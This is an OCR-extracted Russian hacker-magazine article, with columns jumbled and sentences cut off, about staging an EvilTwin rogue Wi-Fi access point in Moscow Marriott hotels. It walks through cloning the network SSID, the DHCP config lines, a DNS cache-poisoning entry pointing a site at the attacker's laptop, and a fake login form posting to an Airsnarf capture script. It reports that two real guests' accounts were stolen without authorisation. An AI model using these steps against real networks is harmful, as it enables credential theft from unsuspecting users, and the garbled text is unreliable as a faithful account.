книги хакеры / журнал хакер / 092_Optimized

Попробуйте подписаться в редакции, позвоните нам.

:)

ПАВЕЛ П. AKA UKR-ХЫР

/ UST / USTSECURITY.INFO

«ИЗ РОССИИ С ЛЮБОВЬЮ», ИЛИ ЧЕГО БОЯТЬСЯ АМЕРИКАНЦАМ В ГОСТИНИЦАХ

РЕАЛИЗАЦИЯ АТАКИ EVILTWIN В ГОСТИНИЧНОЙ СЕТИ MARRIOT

ДЛЯ ПОЛУЧЕНИЯ НЕСАНКЦИОНИРОВАННОГО ДОСТУПА В КОРПОРАТИВНЫЕ WI-FI СЕТИ ПРИХОДИТСЯ ПРИМЕНЯТЬ ВСЕ НОВЫЕ СПОСОБЫ АТАК. К ПРИМЕРУ, БОЛЬШИНСТВО ГОСТИНИЧНЫХ СЕТЕЙ ИСПОЛЬЗУЮТ ЗАШИФРОВАННУЮ ПЕРЕДАЧУ УЧЕТНЫХ ЗАПИСЕЙ, ЧТО СВОДИТ ПЕРЕХВАТ АККАУНТА НА НЕТ. НО, КАЗАЛОСЬ БЫ, ДАЖЕ САМУЮ БЕЗВЫХОДНУЮ СИТУАЦИЮ НАМ ПОМОЖЕТ РАЗРЕШИТЬ НОВЫЙ МЕТОД АТАКИ EVILTWIN. ОБ ОСОБЕННОСТЯХ ДАННОГО НАПАДЕНИЯ МЫ СЕЙЧАС И ПОГОВОРИМ.

МАСКИРУЕМСЯ НА МЕСТНОСТИ

ИНФОРМАЦИЯ ОБ УЯЗВИМОСТЯХ ГОСТИНИЧНОЙ СЕТИ

Из истории...

26 апреля, 2005:

«Участники конференции о беспроводных сетях, проходившей на минувшей неделе в Лондоне, подверглись массивной вирусной атаке,

— сообщает Viruslist.ru. — Неизвестные злоумышленники проникли в помещение, в котором проходила конференция, и открыли ее участникам доступ к сайту, внешне похожему на ресурс для регистрации в Wi-Fi сети. После регистрации на сайте участники конференции получили на свои компьютеры 45 разных вредоносных программ».

16 мая, 2005:

Компания AirDefenc предупредила мировую общественность о появлении еще одного способа мошеннических операций против пользователей сервисов беспроводного доступа. По словам пресс-службы AirDefence, суть обнаруженного экспертами компании метода состоит в том, что жертве подсовывают фальшивый интерфейс входа в общественную беспроводную сеть.

тов платный Wi-Fi доступ. Стоимость услуги беспроводного доступа и минимальное время заказа — 300 рублей за 1 час.

Все нижеописанное проверялось на отелях:

-Marriot Grand

-Marriot Royal Aurora

Все исследование-демонстрация проводилось на стареньком уже ноутбуке P3 с ОС MS Windows 2000 Pro SP4. Как базис. Функции и средства, применяемые в данной статье, прекрасно работают и на более «современных» операционных системах от Microsoft.

Исходные данные

Сканирование радиоэфира на частоте Wi-Fi выявило эту гостиничную сеть и подключенных к ней клиентов:

1 августа, 2005:

Специалист по вопросам безопасности компьютерных сетей Адам Лори, выступая в субботу на конференции Defcon в Лас-Вегасе, описал удручающее состояние в системах защиты современных гостиничных телевизионных сетей. «Система защиты в гостиничных сетях,

— резюмировал Лори, — отсутствует как таковая, что открывает простор для злоумышленников».

Это лишь некоторые примеры того, как тип атаки Rogue AP (EvilTwin) все больше вторгается не только в нашу работу, но и в нашу жизнь. Для тех, кто по каким-либо причинам еще не сталкивался с представленной терминологией, придется пояснить:

Eviltwin — «дьявольский близнец»;

Rogue AP(Accsess Point) — не поддающаяся контролю, неконтроли-

руемая точка доступа.

Два термина, по своей сути, идентичны и уже в расшифровке терминологии описывают вид атак в беспроводных сетях Wi-Fi, основанный на внедрении в радиопространство существующей беспроводной сети, поддельных точек входа в сеть, но таким образом, чтобы для пользователя беспроводной сети данный факт остался незамеченным, «прозрачным».

Для тестирования-демонстрации данного вида атак была выбрана гостиничная сеть Marriot-hotel, включающая в себя несколько отелей в Москве premium-класса (5 звезд) и предлагающая для своих клиен-

Это данные по точкам доступа, установленным в гостиничном комплексе. Итак, что нам необходимо знать при проведении атаки EvilTwin?

1/ MAC-адрес точки доступа;

2/ Рабочая частота точки доступа (канал);

3/ Наименование (SSID) атакуемой сети (устройства);

4/ Надо ли вообще проводить атаку EvilTwin? Не даст ли нам требуемой информации перехват сниферами беспроводного трафика?

5/ «Популярность» данной публичной коммерческой беспроводной сети. Что толку сидеть и ждать у моря погоды, если услугой пользуется директор заведения раз в сутки? Соответственно, эффективность атаки очень сильно зависит от числа обращений, подключения к сети, новых пользователей или ротация старых.

6/ Сила сигнала точки доступа. Мы не будем нарушать заданный режим работы имеющегося оборудования в компании. «Гасить» реальные точки доступа не потребуется, хотя зачастую необходимость проведения DOS-атак на объекты инфраструктуры сети стоит очень остро. В данном случае мы имеем:

Имя сети: MoscomNET

MAC-адрес: 00:0d:29:1d:d7:dd - сравнивая первые 3 октета MAC-ад- реса в базе OUI, становится понятно, что используется оборудование компании Cisco Systems.

Канал: 11.

КАК ВИДИШЬ, АДАПТЕР ОТОБРАЖАЕТ ТОЛЬКО ОДНУ СЕТЬ – МОЮ :)

Далее нас будет интересовать сетевая адресация, применяемая в сегменте сети:

Результат команды ipconfig /all

Настройка протокола IP для Windows 2000

Имя компьютера . . . . . . . . . : usthead1 Основной DNS-суффикс . . . . . . : Тип узла . . . . . . . . . . . . : Гибридный

Включена IP-маршрутизация . . . . : Нет Доверенный WINS-сервер . . . . . : Нет

Адаптер UST_WiFi_drvr:

DNS суффикс этого подключения . . : Описание . . . . . . . . . . . . : UST_WiFi_drvr_Compx Физический адрес. . . . . . . . . : 00-80-48-2B-84-34 DHCP разрешен . . . . . . . . . . : Да Автонастройка включена . . . . . : Да

IP-адрес . . . . . . . . . . . . : 10.43.1.155 Маска подсети . . . . . . . . . . : 255.255.0.0 Основной шлюз . . . . . . . . . . : 10.43.1.1 DHCP-сервер . . . . . . . . . . . : 10.43.1.1 DNS-серверы . . . . . . . . . . . : 212.130.104.10

195.68.135.5 Основной WINS-сервер . . . . . . : 10.43.1.1

Собственно говоря, комментарии излишни. При попытке инициализации какой-либо http-сессии (обращении на какой-либо сайт) мы видим форму аутентификации в системе, оповещающую нас о поставщике услуг беспроводной связи и двухфакторной аутентификации в виде логина и пароля, каждый из которых состоит из 4-х цифровых символов. Аутентификация проходит с применением безопасного доступа HTTP Secured с применением SSL. Что, в свою очередь, практически сводит на нет перехват реквизитов доступа с помощью многочисленных беспроводных сниферов, к примеру, тем же самым Kismet’ом.

В итоге наша задача состоит из следующих этапов:

1/ Поднятие своей точки доступа:

•обеспечение подключения клиентов к своей точке доступа в режиме Infrastructure;

•предоставление нашей точкой доступа DNS-, DHCP-сервисов.

2/ Создание ложного веб-сервиса, эмулирующего работу реальной аутентификационной панели.

Конечная задача — доступ к выданным пользователям реквизитам до-

ступа, аккаунтам на пользование услугами связи. Исходное аппаратное и программное обеспечение:

1/ Ноутбук, уже упоминавшийся выше;

2/ Для реализации точки доступа на ноутбуке и превращения его в роутер есть три пути:

а) У тебя уже есть адаптер на чипсете agere/hermes, штатными средствами которого ты можешь перевести режим работы не только в adhoc (точка-точки) или infrastructure (многоточие-точка), но и в режим act as base station, то есть эмуляции точки доступа.

б) Использование программного средства SoftAP (http://www.pctel. com/softap.php), но при условии, что имеющийся у тебя клиентский Wi-Fi адаптер поддерживается данным продуктом. Эта софтина платная.

в) SoftAP стоит порядка $30. За эту же сумму предпочтительнее обзавестить адаптером. Использовавшихся в данном случае Compex WL11B, примечательной особенностью которого является не только чипсет Agere Hermes, но и наличие MC-MX разъема для подключения внешней антенны или усилителя. А цена его в московских магазинах

— чуть меньше стоимости SoftAP.

3/ В качестве DNS-сервера рекомендую использовать TreeWalk (http://ntcanuck.com). Преимущества: бесплатен, поддержка bind, простая конфигурация и использование.

4/ В качестве DHCP-сервера рекомендую использовать NusyDHCP (http://sourceforge. net/projects/loosydhcp/). Преимущества аналогичны TreeWalk.

5/ Веб-сервер Apache в пояснениях не нуждается. Будет использоваться данная сборка: apache_2.0.58-win32-x86-no_ssl.msi

6/ Интерпретатор Perl в реализации ActiveState Perl в одной из последних сборок: ActivePerl-5.8.6.811-MSWin32-x86-122208. msi

7/ Airsnarf for Windows от исследовательской группы Shmoo, которые одни из первых поведали отрасли и бизнесу об атаке RogueAP (http://airsnarf.shmoo.com).

В атаку!

Для места проведения атаки (установки точки доступа) был выбран ресторан в фойе гостиничного комплекса, где уже находились поль-

НАЧАЛЬНАЯ СТРАНИЦА АВТОРИЗАЦИИ

РАЗВОРАЧИВАЕМ ТОЧКУ ДОСТУПА

зователи Wi-Fi. Место размещения обусловлено тем, что сила сигнала моей точки доступа должна превышать силу сигнала реальных точек доступа. Это сделано намеренно: ведь клиентские адаптеры прии выборе сети для соединения, имеющих одинаковые идентификаторы (ssid+mac+channel), изберут точку с наиболее высокими показателями уровня сигнала.

Поэтому мой Wi-Fi адаптер был переведен в режим точки доступа, а идентификатор сети был выбран MoscomNET.

Присоединяясь к сети, мы уже получили представление о применяемой сетевой адресации, поэтому необходимо было внести в конфигурационный файл DHCP-сервера dhcpd.conf следующие строки:

subnet 255.255.0.0 router 10.43.1.1 dns 10.43.1.1

wins 10.43.1.1

В файле dhcp.iplist необходимо указать диапазон выдачи IP-адре- сов:

10.43.1.150

10.43.1.154

Единственное отличие, по сравнению с атакуемым сегментом, — это адрес DNS-сервера, в качестве которого выступает мой ноутбук. Собственно говоря, следующим шагом мы произведем локальный DNS cache poisoning. Через управляющую панель DNS-сервера останавливаем сервис. После остановки сервиса потребуется отредактировать кэш сервера по следующему пути:

C:\\system32\dns\etc\named.cache

Редактирование заключается во внесении следующих строк в конфиг:

;local

www.xakep.ru 155000 A 10.43.1.1

Теперь все присоединенные ко мне клиенты беспроводной сети, захотев почитать новости на нашем сайте, получат ответ от локального веб-сервера, установленного на ноутбуке.

Веб-сервер мы настроим следующим образом: обязательно сохраним аутентификационную страницу с приглашением ввода данных аккаунта в /htdocs и исправим пути к файлам изображений. Для достижения цели вместо исходной процедуры вставим скрипт перехва-

та данных Airsnarf:

portal.asp?action=billing&sig=cfb0e305ecc3825baca2caed4f6449ea

method=post>

В исходный код заглавной страницы внесем:

<form action="/cgi-bin/airsnarf.cgi" method="post">

и

<input type="text" name="username"> -

<input type="password" name="password"><br> <input type="submit" value="Continue">

После выполнения данных мероприятий остается ждать. На моем стареньком ноутбуке батарейки хватает на 3 часа. За два часа, проведенных за распитием кофе в отеле, были скомпрометированы две учетные записи пользователей.

Хочу заметить: смена MAC-адреса своего адаптера на MAC-адрес атакуемой сети желательна, но не обязательна. Все равно стандартные клиент-менеджеры беспроводного адаптера на ноутбуках (включая менеджер беспроводной связи от Microsoft) покажут только одну сеть...

Увидев в окне вывода DHCP-сервера информацию о запросе-выдачи IP-адреса, уже можно с большей вероятностью предположить, что в файле marriot.txt мы увидим 8 заветных цифр.

Лог выдачи IP-адреса DHCP-сервером

INFO: Moreton Bay DHCP Server (v0.8.25-3 WIN) started

INFO: Listening for DHCP messages on network...

INFO: oooh, got some!

INFO: Alarm off

INFO: received a DHCPDISCOVER

INFO: Searching for address for new client...

INFO: file yielded valid MAC/IP pair - ip_addr = 200000a

INFO: received a DHCPREQUEST

INFO: 0a000001

INFO: Sending ACK

INFO: Entering cycle - Number of current offers = 1

INFO: cycle No - 0

INFO: chaddr matches what we have in our internel offer array

INFO: Sending ACK for ip_addr 10.43.1.2

INFO: got a valid MAC/IP pair from dhcpd.leases

«ИЗ РОССИИ С ЛЮБОВЬЮ», ИЛИ ЧЕГО БОЯТЬСЯ АМЕРИКАНЦАМ В ГОСТИНИЦАХ

INFO: ip_addr taken = 200000a

INFO: Alarm On

INFO: Listening for DHCP messages on network...

Вот и первый клиент присоединился к нашей поддельной точке доступа. Просмотрев позже файл с результатом перехвата, я обнаружил учетные записи:

щитных механизмов, а клиенты корпоративной сети, подсоединяясь к тебе, будут получать deassociation frames, приводящие к разрыву соединений между тобой и клиентами.

3/ Воровать чужие пароли нехорошо — тебя будут мучить угрызения совести :). z

взлом

ДОКУЧАЕВА «ARSY» ОКСАНА

/ ARSY.ARSY@GMAIL.COM /

ПРЕСТУПЛЕНИЕ И НАКАЗАНИЕ